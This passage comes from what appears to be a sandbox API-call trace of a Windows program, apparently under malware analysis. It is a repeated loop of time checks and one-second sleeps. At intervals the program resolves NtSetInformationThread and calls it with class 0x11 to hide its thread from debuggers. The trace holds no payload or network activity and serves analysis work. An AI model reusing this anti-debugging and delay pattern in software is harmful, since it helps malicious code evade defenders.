lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1f, wMilliseconds=0x1f6)) [0195.678] GetTickCount () returned 0x1d60233 [0195.678] Sleep (dwMilliseconds=0x3e8) [0195.738] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1f, wMilliseconds=0x234)) [0195.738] GetTickCount () returned 0x1d60658 [0195.738] Sleep (dwMilliseconds=0x3e8) [0195.838] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1f, wMilliseconds=0x292)) [0195.838] GetTickCount () returned 0x1d60a9d [0195.838] Sleep (dwMilliseconds=0x3e8) [0195.927] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1f, wMilliseconds=0x2f0)) [0195.928] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0195.928] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0195.928] GetCurrentThread () returned 0xfffffffe [0195.928] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0195.929] GetTickCount () returned 0x1d60ee1 [0195.929] Sleep (dwMilliseconds=0x3e8) [0196.003] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1f, wMilliseconds=0x33e)) [0196.003] GetTickCount () returned 0x1d61316 [0196.003] Sleep (dwMilliseconds=0x3e8) [0196.219] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x20, wMilliseconds=0x30)) [0196.220] GetTickCount () returned 0x1d617d8 [0196.220] Sleep (dwMilliseconds=0x3e8) [0196.271] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x20, wMilliseconds=0x5f)) [0196.272] GetTickCount () returned 0x1d61bed [0196.272] Sleep (dwMilliseconds=0x3e8) [0196.359] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x20, wMilliseconds=0xbc)) [0196.360] GetTickCount () returned 0x1d62032 [0196.360] Sleep (dwMilliseconds=0x3e8) [0196.571] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x20, wMilliseconds=0x187)) [0196.572] GetTickCount () returned 0x1d624e4 [0196.572] Sleep (dwMilliseconds=0x3e8) [0196.625] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x20, wMilliseconds=0x1c6)) [0196.625] GetTickCount () returned 0x1d62909 [0196.625] Sleep (dwMilliseconds=0x3e8) [0196.687] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x20, wMilliseconds=0x204)) [0196.687] GetTickCount () returned 0x1d62d2f [0196.687] Sleep (dwMilliseconds=0x3e8) [0196.758] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x20, wMilliseconds=0x242)) [0196.758] GetTickCount () returned 0x1d63154 [0196.758] Sleep (dwMilliseconds=0x3e8) [0196.864] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x20, wMilliseconds=0x2b0)) [0196.864] GetTickCount () returned 0x1d635a8 [0196.864] Sleep (dwMilliseconds=0x3e8) [0196.929] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x20, wMilliseconds=0x2ee)) [0196.930] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0196.930] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0196.930] GetCurrentThread () returned 0xfffffffe [0196.930] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0196.930] GetTickCount () returned 0x1d639ce [0196.930] Sleep (dwMilliseconds=0x3e8) [0196.999] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x20, wMilliseconds=0x33c)) [0196.999] GetTickCount () returned 0x1d63e03 [0196.999] Sleep (dwMilliseconds=0x3e8) [0197.062] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x20, wMilliseconds=0x37a)) [0197.062] GetTickCount () returned 0x1d64228 [0197.063] Sleep (dwMilliseconds=0x3e8) [0197.204] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x21, wMilliseconds=0x1f)) [0197.204] GetTickCount () returned 0x1d6469b [0197.204] Sleep (dwMilliseconds=0x3e8) [0197.266] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x21, wMilliseconds=0x5d)) [0197.266] GetTickCount () returned 0x1d64ac1 [0197.266] Sleep (dwMilliseconds=0x3e8) [0197.361] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x21, wMilliseconds=0xbb)) [0197.361] GetTickCount () returned 0x1d64f05 [0197.361] Sleep (dwMilliseconds=0x3e8) [0197.451] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x21, wMilliseconds=0x118)) [0197.451] GetTickCount () returned 0x1d6534a [0197.451] Sleep (dwMilliseconds=0x3e8) [0197.550] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x21, wMilliseconds=0x176)) [0197.551] GetTickCount () returned 0x1d6578f [0197.551] Sleep (dwMilliseconds=0x3e8) [0197.653] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x21, wMilliseconds=0x1e3)) [0197.653] GetTickCount () returned 0x1d65be3 [0197.653] Sleep (dwMilliseconds=0x3e8) [0197.717] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x21, wMilliseconds=0x222)) [0197.717] GetTickCount () returned 0x1d66008 [0197.717] Sleep (dwMilliseconds=0x3e8) [0197.847] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x21, wMilliseconds=0x29e)) [0197.848] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0197.848] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0197.848] GetCurrentThread () returned 0xfffffffe [0197.848] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0197.848] GetTickCount () returned 0x1d6646c [0197.848] Sleep (dwMilliseconds=0x3e8) [0197.964] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x21, wMilliseconds=0x30c)) [0197.965] GetTickCount () returned 0x1d668d0 [0197.965] Sleep (dwMilliseconds=0x3e8) [0198.055] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x21, wMilliseconds=0x369)) [0198.055] GetTickCount () returned 0x1d66d05 [0198.055] Sleep (dwMilliseconds=0x3e8) [0198.328] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x9a)) [0198.328] GetTickCount () returned 0x1d67205 [0198.328] Sleep (dwMilliseconds=0x3e8) [0198.420] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0xf8)) [0198.421] GetTickCount () returned 0x1d67649 [0198.421] Sleep (dwMilliseconds=0x3e8) [0198.469] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x126)) [0198.470] GetTickCount () returned 0x1d67a5f [0198.470] Sleep (dwMilliseconds=0x3e8) [0198.484] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x136)) [0198.484] GetTickCount () returned 0x1d67e56 [0198.484] Sleep (dwMilliseconds=0x3e8) [0198.508] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x146)) [0198.508] GetTickCount () returned 0x1d6824c [0198.509] Sleep (dwMilliseconds=0x3e8) [0198.514] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x155)) [0198.514] GetTickCount () returned 0x1d68643 [0198.514] Sleep (dwMilliseconds=0x3e8) [0198.542] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x174)) [0198.543] GetTickCount () returned 0x1d68a49 [0198.543] Sleep (dwMilliseconds=0x3e8) [0198.590] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x1a3)) [0198.590] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.591] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.591] GetCurrentThread () returned 0xfffffffe [0198.591] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.591] GetTickCount () returned 0x1d68e5f [0198.591] Sleep (dwMilliseconds=0x3e8) [0198.641] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x1d8)) [0198.641] GetTickCount () returned 0x1d69275 [0198.641] Sleep (dwMilliseconds=0x3e8) [0198.650] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x1e1)) [0198.650] GetTickCount () returned 0x1d6966b [0198.650] Sleep (dwMilliseconds=0x3e8) [0198.657] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x1e8)) [0198.657] GetTickCount () returned 0x1d69a52 [0198.657] Sleep (dwMilliseconds=0x3e8) [0198.660] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x1eb)) [0198.660] GetTickCount () returned 0x1d69e39 [0198.660] Sleep (dwMilliseconds=0x3e8) [0198.671] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x1f6)) [0198.671] GetTickCount () returned 0x1d6a230 [0198.671] Sleep (dwMilliseconds=0x3e8) [0198.678] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x1fd)) [0198.678] GetTickCount () returned 0x1d6a617 [0198.678] Sleep (dwMilliseconds=0x3e8) [0198.680] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x1ff)) [0198.680] GetTickCount () returned 0x1d6aa0d [0198.680] Sleep (dwMilliseconds=0x3e8) [0198.684] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x203)) [0198.684] GetTickCount () returned 0x1d6adf4 [0198.684] Sleep (dwMilliseconds=0x3e8) [0198.686] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x205)) [0198.686] GetTickCount () returned 0x1d6b1db [0198.686] Sleep (dwMilliseconds=0x3e8) [0198.687] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x206)) [0198.688] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.688] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.688] GetCurrentThread () returned 0xfffffffe [0198.688] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.692] GetTickCount () returned 0x1d6b5c2 [0198.692] Sleep (dwMilliseconds=0x3e8) [0198.694] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x20d)) [0198.694] GetTickCount () returned 0x1d6b9a9 [0198.694] Sleep (dwMilliseconds=0x3e8) [0198.698] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x211)) [0198.698] GetTickCount () returned 0x1d6bda0 [0198.698] Sleep (dwMilliseconds=0x3e8) [0198.701] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x214)) [0198.701] GetTickCount () returned 0x1d6c187 [0198.701] Sleep (dwMilliseconds=0x3e8) [0198.702] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x219)) [0198.706] GetTickCount () returned 0x1d6c56e [0198.706] Sleep (dwMilliseconds=0x3e8) [0198.707] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x21a)) [0198.707] GetTickCount () returned 0x1d6c955 [0198.707] Sleep (dwMilliseconds=0x3e8) [0198.709] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x21c)) [0198.709] GetTickCount () returned 0x1d6cd3c [0198.709] Sleep (dwMilliseconds=0x3e8) [0198.710] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x21d)) [0198.710] GetTickCount () returned 0x1d6d123 [0198.711] Sleep (dwMilliseconds=0x3e8) [0198.712] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x21f)) [0198.712] GetTickCount () returned 0x1d6d51a [0198.712] Sleep (dwMilliseconds=0x3e8) [0198.714] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x221)) [0198.714] GetTickCount () returned 0x1d6d901 [0198.717] Sleep (dwMilliseconds=0x3e8) [0198.719] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x226)) [0198.720] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.720] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.720] GetCurrentThread () returned 0xfffffffe [0198.720] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.721] GetTickCount () returned 0x1d6dce8 [0198.721] Sleep (dwMilliseconds=0x3e8) [0198.723] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x22a)) [0198.723] GetTickCount () returned 0x1d6e0cf [0198.724] Sleep (dwMilliseconds=0x3e8) [0198.729] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x230)) [0198.730] GetTickCount () returned 0x1d6e4c5 [0198.730] Sleep (dwMilliseconds=0x3e8) [0198.734] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x235)) [0198.734] GetTickCount () returned 0x1d6e8ac [0198.734] Sleep (dwMilliseconds=0x3e8) [0198.739] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x23a)) [0198.739] GetTickCount () returned 0x1d6ec93 [0198.739] Sleep (dwMilliseconds=0x3e8) [0198.740] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x23b)) [0198.741] GetTickCount () returned 0x1d6f07a [0198.741] Sleep (dwMilliseconds=0x3e8) [0198.742] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x23d)) [0198.743] GetTickCount () returned 0x1d6f471 [0198.743] Sleep (dwMilliseconds=0x3e8) [0198.746] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x241)) [0198.746] GetTickCount () returned 0x1d6f858 [0198.746] Sleep (dwMilliseconds=0x3e8) [0198.748] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x243)) [0198.748] GetTickCount () returned 0x1d6fc3f [0198.748] Sleep (dwMilliseconds=0x3e8) [0198.750] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x245)) [0198.751] GetTickCount () returned 0x1d70026 [0198.751] Sleep (dwMilliseconds=0x3e8) [0198.754] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x249)) [0198.759] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.759] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.759] GetCurrentThread () returned 0xfffffffe [0198.759] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.760] GetTickCount () returned 0x1d7041c [0198.760] Sleep (dwMilliseconds=0x3e8) [0198.761] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x250)) [0198.761] GetTickCount () returned 0x1d70803 [0198.761] Sleep (dwMilliseconds=0x3e8) [0198.763] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x252)) [0198.763] GetTickCount () returned 0x1d70bea [0198.763] Sleep (dwMilliseconds=0x3e8) [0198.770] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x259)) [0198.770] GetTickCount () returned 0x1d70fd1 [0198.770] Sleep (dwMilliseconds=0x3e8) [0198.772] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x25b)) [0198.772] GetTickCount () returned 0x1d713b8 [0198.772] Sleep (dwMilliseconds=0x3e8) [0198.773] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x25c)) [0198.773] GetTickCount () returned 0x1d717af [0198.774] Sleep (dwMilliseconds=0x3e8) [0198.776] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x25f)) [0198.776] GetTickCount () returned 0x1d71b96 [0198.776] Sleep (dwMilliseconds=0x3e8) [0198.778] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x261)) [0198.778] GetTickCount () returned 0x1d71f7d [0198.778] Sleep (dwMilliseconds=0x3e8) [0198.779] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x262)) [0198.779] GetTickCount () returned 0x1d72364 [0198.780] Sleep (dwMilliseconds=0x3e8) [0198.781] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x264)) [0198.781] GetTickCount () returned 0x1d7274b [0198.781] Sleep (dwMilliseconds=0x3e8) [0198.783] GetLocalTime (in: 